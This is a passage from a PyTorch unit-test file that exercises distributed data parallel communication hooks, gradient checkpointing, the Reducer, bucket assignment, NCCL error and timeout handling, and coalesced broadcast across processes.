self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [(powerSGD.powerSGD_hook, powerSGD_state), (default.allreduce_hook, process_group)]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
        can give the same result as when no hook is registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
        can give the same result as when no hook is registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
tensors = [bucket.get_tensor() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return [10 * t for t in fut.value()]
def div(fut):
# Divide the result by 2.
return [0.5 * t for t in fut.value()]
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
        # check whether the grads are equal to what allreduce returns multiplied by 5.
        # without the comm_hook, result would still be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
@requires_gloo()
def test_ddp_invalid_comm_hook_init(self):
"""
        This unit test makes sure that register_comm_hook properly checks the format
        of the hook defined by the user. The Python hook must be callable. This test
        also checks whether the bucket annotation is checked properly, if defined.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(TypeError, "Communication hook must be callable."):
model.register_comm_hook(state=None, hook=1)
with self.assertRaisesRegex(
ValueError, "bucket annotation should be dist.GradBucket."
):
def comm_hook(state: object, bucket: int) -> torch.futures.Future:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
@requires_gloo()
def test_ddp_invalid_comm_hook_return_type(self):
"""
        This test checks whether the return annotation is checked properly, if defined.
        It also checks whether an internal error is thrown if the return type is
        incorrect and the user hasn't specified any return type annotation.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(
ValueError,
"Communication hook: return annotation should be torch.futures.Future or torch._C.Future.",
):
def comm_hook(state: object, bucket: dist.GradBucket) -> int:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
with self.assertRaisesRegex(
RuntimeError,
"callback must return a torch.futures.Future or torch._C.Future object, but got",
):
def comm_hook(state: object, bucket: dist.GradBucket):
return 1
model.register_comm_hook(state=None, hook=comm_hook)
# Run forward
output = model(8, self.rank)
# Run backward
output.mean().backward()
@requires_gloo()
def test_ddp_comm_hook_register_just_once(self):
"""
        A DDP communication hook can only be registered once. This test validates that
        the error is thrown properly when register_comm_hook is called more than once.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
def dummy_hook(state, bucket):
fut = torch.futures.Future()
fut.set_result([bucket.get_tensor()])
return fut
model.register_comm_hook(None, dummy_hook)
with self.assertRaisesRegex(
RuntimeError,
"register_comm_hook or register_builtin_comm_hook can only be called once.",
):
model.register_comm_hook(None, dummy_hook)
@requires_gloo()
def test_ddp_comm_hook_sparse_gradients(self):
"""
Runs "test_sparse_gradients" unit test with DDP communication hook. We define a
simple hook that does allreduce and works with gloo backend for this test.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
)
# "get_future" API does not support gloo backend, see GH Issue #42048.
# Instead, we wait for an allreduce work, and write its result to a Future.
def allreduce_hook_gloo(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
# Prepare allreduced grad bucket tensors by running an async work.
work = process_group.allreduce([bucket.get_tensor()])
work.wait()
fut = torch.futures.Future()
fut.set_result([bucket.get_tensor() / self.world_size])
return fut
ddp_model.register_comm_hook(None, allreduce_hook_gloo)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(self.AcceptsParam(p, dev + 1),
self.AcceptsParam(p, dev + 1)).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(p, 2. * (world * (world + 1.) / 2.) / world, device=dev)
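                # For example, with world_size = 2 this evaluates to
                # 2. * (2. * 3. / 2.) / 2. = 3. for every element.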
for name, p in m.named_parameters():
self.assertEqual(p.grad, analytic, "mismatch at " + name + ".grad for " +
"set_to_none = {}, use_bucket_view = {}".format(try_set_to_none,
use_bucket_view))
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
    # Most of the tests are adapted from
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(2000, 2000)
self.l2 = nn.Linear(2000, 2000)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _test_ddp_checkpointing(self, checkpoint_once, process_group, use_bucket_view, find_unused_parameters=False):
        # to reproduce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
if checkpoint_once:
model = self.CheckpointOnceModule().cuda()
else:
model = self.CheckpointTwiceModule().cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = model(input_tensor)
output_tensor.sum().backward()
return model
    # DDP works as expected when a layer is checkpointed only once
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view)
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 78053), norm
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
    # DDP will fail when the same layer is checkpointed twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=False,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view in (True, False):
torch.manual_seed(31415)
l1 = nn.Linear(2000, 2000)
l2 = nn.Linear(2000, 2000)
l1.weight = l2.weight
model = nn.Sequential(l1, l2).cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = checkpoint(model, input_tensor)
output_tensor.sum().backward()
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 57004), norm
class ReducerModule(nn.Module):
def __init__(self):
super(ReducerModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, use_fc3=True):
x = self.relu(self.fc1(x)).float()
x = self.relu(self.fc2(x)).float()
if use_fc3:
x = self.fc3(x).float()
return F.softmax(x, dim=1)
@requires_gloo()
class ReducerTest(TestCase):
def setUp(self):
self.file = tempfile.NamedTemporaryFile(delete=False)
self.store = c10d.FileStore(self.file.name, 1)
self.process_group = c10d.ProcessGroupGloo(self.store, 0, 1)
def test_single_dtype_single_bucket(self):
model = ReducerModule()
parameters = list(model.parameters())
buckets = [list(range(len(parameters)))]
dist.Reducer([parameters], buckets, self.process_group)
def _create_mixed_precision_model(self):
model = ReducerModule()
model.float()
model.fc1.double()
return model
def test_multi_dtype_single_bucket(self):
model = self._create_mixed_precision_model()
# Raise if there are multiple types per bucket.
# In this case we create one bucket for all parameters.
with self.assertRaises(RuntimeError):
parameters = [list(model.parameters())]
buckets = [list(range(len(parameters[0])))]
dist.Reducer(parameters, buckets, self.process_group)
def test_multi_dtype_multi_bucket(self):
model = self._create_mixed_precision_model()
parameters = [list(model.parameters())]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
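        # Note: groupby (presumably itertools.groupby) only groups consecutive items,
        # which suffices here because parameters of the same dtype are adjacent in the
        # mixed-precision model.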
buckets = [list(indices) for _, indices in group_by_dtype]
dist.Reducer(parameters, buckets, self.process_group)
def _create_reducer_for_models(self, models, find_unused_parameters=False):
parameters = [list(model.parameters()) for model in models]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
buckets = [list(indices) for _, indices in group_by_dtype]
return dist.Reducer(
parameters,
buckets,
self.process_group,
find_unused_parameters=find_unused_parameters,
)
def test_reducer_no_multi_replicas(self):
num_replicas = 2
models = [self._create_mixed_precision_model() for _ in range(num_replicas)]
with self.assertRaisesRegex(
RuntimeError,
"Expected exactly one model replica.",
):
reducer = self._create_reducer_for_models(models)
def test_forward_backward(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model])
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input), target)
reducer.prepare_for_backward(output)
output.backward()
def test_forward_backward_unused_parameters(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input, use_fc3=False), target)
# Check that the grad of fc3 is not set.
self.assertEqual(None, model.fc3.weight.grad)
# Compute and accumulate gradients.
reducer.prepare_for_backward(output)
output.backward()
# The reducer will have marked the grad of fc3 as ready, because
# it doesn't show up in the autograd graph of `output`. Since fc3.weight
        # is considered globally unused, it will be left untouched as None.
self.assertEqual(None, model.fc3.weight.grad)
def test_forward_backward_optimizer(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters())
for i in range(3):
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# The `zero_grad` function calls `detach_` and `zero_` on the grad
# tensors of model parameters. If we tried to set the grad tensors
# to a view of the reducer's bucket tensors, this would blow up.
optimizer.zero_grad()
# Unused parameter only in the first iteration.
output = loss(model(input, use_fc3=(i > 0)), target)
reducer.prepare_for_backward(output)
output.backward()
optimizer.step()
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
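        # Assuming 4 bytes per float, these tensors occupy 400, 800, 400, and 200
        # bytes, so with a 400-byte limit each one is assigned its own bucket, as the
        # expected result below reflects.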
result = dist._compute_bucket_assignment_by_size(tensors, [400])
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [400])
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result = dist._compute_bucket_assignment_by_size(tensors, [40, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [200, 400])
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._fork_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get("NCCL_ASYNC_ERROR_HANDLING", None)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
            # This allreduce does not block the Python thread, as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
            # Clean up structures (e.g., files for FileStore) before going down
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class CommTest(MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
        # The tensors to pass to broadcast are identical to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_gloo_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cuda:%d" % self.rank)
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_broadcast_coalesced_gloo_cpu(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cpu")
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_pass_gloo_options(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
pg_opts._devices = [create_device(interface=LOOPBACK)]
pg_opts._threads = 2
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
default_pg = c10d.distributed_c10d._get_default_group()
        # Test that devices are properly set on options if the user doesn't set devices
no_device_thread_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_thread_pg = dist.new_group([0, 1], pg_options=no_device_thread_pg_opts)
self.assertTrue(len(no_device_thread_pg.options._devices) != 0)
        # ensure the created pg has the correct timeout set instead of the default timeout
self.assertEqual(no_device_thread_pg.options.timeout, timedelta(seconds=10))
        # Test that passing in Options with threads set but devices not set errors out
no_device_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_pg_opts._threads = 4
with self.assertRaisesRegex(
